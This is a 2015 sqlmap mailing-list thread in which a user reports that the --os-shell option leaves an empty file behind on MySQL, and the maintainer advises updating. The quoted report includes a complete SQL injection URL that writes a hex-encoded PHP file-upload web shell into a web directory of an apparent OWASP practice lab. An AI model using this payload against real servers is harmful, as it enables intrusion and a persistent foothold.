Re: [sqlmap-users] SQLmap --os-shell BUG

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

I believe that you are using an old revision. For a long time there is at
least a git revision or a pseudo "non-git" number appearing when "sqlmap
--version" is being used.

Please update to the latest revision from the official github repository
and rerun the sqlmap.

Bye

On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:

> Thanks
>
> sqlmap --version
> sqlmap/1.0-dev
>
> In the meantime I will patch procs/mysql/write_file_limit.sql
>
>
>
>
> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Which revision/version of sqlmap do you use? There has been a related
>> patch a month ago. Will check tomorrow.
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>
>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>
>>> Description:
>>>
>>> A specific PAYLOAD (see below) used to upload a web shell will create an
>>> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
>>> attempt will fail with an "already exist" error and therefore not able
>>> to upload the web shell.
>>>
>>>
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>
>>> By default, MySQL will throw an error if the file already exists:
>>>
>>> mysql> select 'ss' into outfile
>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
>>> already exists
>>>
>>> Solution:
>>>
>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>> when using the -os-shell option
>>> 2. Fix the PAYLOAD causing problems.
>>>
>>> --
>>> DanUx
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Don't Limit Your Business. Reach for the Cloud.
>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>> you need to offload your IT needs and focus on growing your business.
>>> Configured For All Businesses. Start Your Cloud Today.
>>> https://www.gigenetcloud.com/
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> DanUx
>

-- 
Miroslav Stampar
http://about.me/stamparm